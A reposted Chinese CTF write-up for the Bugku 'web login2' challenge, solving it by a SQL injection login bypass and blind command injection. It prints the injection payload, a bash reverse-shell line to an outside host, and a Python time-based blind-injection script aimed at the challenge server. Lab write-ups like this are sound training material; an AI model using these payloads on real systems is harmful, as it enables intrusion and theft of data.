1. 首页
  2. 文章中心
  3. BUGKU

Bugku web login2

45 阅读 0 评论
我是靠谱客的博主 大方蜜粉,最近开发中收集的这篇文章主要介绍Bugku web login2,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

今天中午忙着去吃饭,场景过时了,就没法录视频了,简单说一下吧:
前面都一样,通过sql注入过登录界面,先随便提交点啥,burp抓包,发现response有base64编码内容,解码发现是php代码

$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

由于没有限制行数,盲猜可以union select绕过
构造payload:username=admin’ union select 1,md5(1)#&password=1
直接绕过,登录进去像是一个命令行执行窗口,但是输入回显只有进程信息,应该是进行了输出过滤,借用sleep函数(123;sleep 5),可以确定命令执行了,只是没回显
到这就有多个思路了,先说第一种吧
1.二次回显,没回显只是当前页面做了过滤,可是管道符没有过滤,用cat /flag>test,再直接查看test文件即可,当然之前需要查找
find / -name flag>test1
2.这题出题人的本意是想反弹shell到vps上,但是我是没有vps的,所以这题出题人也没有考虑绝大多数人的情况
就写个命令吧 bash -i >& /dev/tcp/ip/port 0>&1 vps其实就是一个有公网ip的主机,是内外网的接入点,一般需要付费购买。也有免费的,不过要注册
反正我是懒得弄了,一般需要进行端口转发,就是可能很多台主机共用一个ip,所以需要通过端口进行进一步的划分主机,把kali当成端口绑定的内网主机
和外网的vps端口进行绑定,这样通过外网vps端口的流量会默认转发到kali相应的端口上,拿到shell,直接查找flag就好了
3.就是根据时间盲注硬跑,亲测时间非常长,效率很慢,直接上脚本:

import requests
url = 'http://114.67.246.176:13412/index.php'
s = requests.session()
allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
database = ''
flag = 1
comm = input('输入指令:')
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Referer': 'http://114.67.246.176:13412/index.php',
}
cookies = dict(PHPSESSID='ddfnka50kbj2mh9u5k27paijd4')
for i in range(0, 100):
# 根据自身需要改长度,如果空格连续出现四次以上,就说明后续没内容了
for j in allString:
if j == "^":
j = " "
data = {'c': "123;a=`" + comm + "`;b=' ';if [ ${a:" + str(i) + ":1} == $b ];then sleep 4;fi"}
else:
data = {'c': "123;a=`" + comm + "`;b='" + str(j) + "';if [ ${a:" + str(i) + ":1} == $b ];then sleep 4;fi"}
r = requests.post(url, data=data, headers=headers, cookies=cookies)
t = r.elapsed.total_seconds()
# print(r.text)
print(database + j + ' 的时间'+ ' 是 ' + str(t))
if t >= 4:
database = database + j
print(str(i) + ' 为 ' + j)
break
elif t < 4 and j == 'M':
flag = 0
break
if flag == 0:
break
print('', database)

简单理一下思路吧,就是他是根据命令执行的结果来判断来决定是否sleep,在这个脚本里是4s,如果猜对了,就延时4s,不对,就结束这次循环
a是需要执行的系统命令${a:0:1}表示a执行以后从第0个字符开始读1个字符,如果和循环里的b一样的话,那么就表示猜对了,就延时4s并打印结束这次大循环
否则就一直执行,就是一直猜,猜到所有输出都对为止,沾点暴力破解了

最后

以上就是大方蜜粉为你收集整理的Bugku web login2的全部内容,希望文章能够帮你解决Bugku web login2所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(30)

相关文章

webug4.0之xxe注入
webug4.0之xxe注入
什么是系统瓶颈?
什么是系统瓶颈?
关于安卓10以上连接wifi无法联网的问题
关于安卓10以上连接wifi无法联网的问题
Android 6.0 关于WiFi的改变问题:分析原因解决方法:
Android 6.0 关于WiFi的改变问题:分析原因解决方法:
Bugku web login2
Bugku web login2
bugku--SQL注入((利用脚本))
bugku--SQL注入((利用脚本))
网安实验室CTF 注入篇
网安实验室CTF 注入篇
bugku login2
bugku login2

评论列表共有 0 条评论

立即
投稿
返回
顶部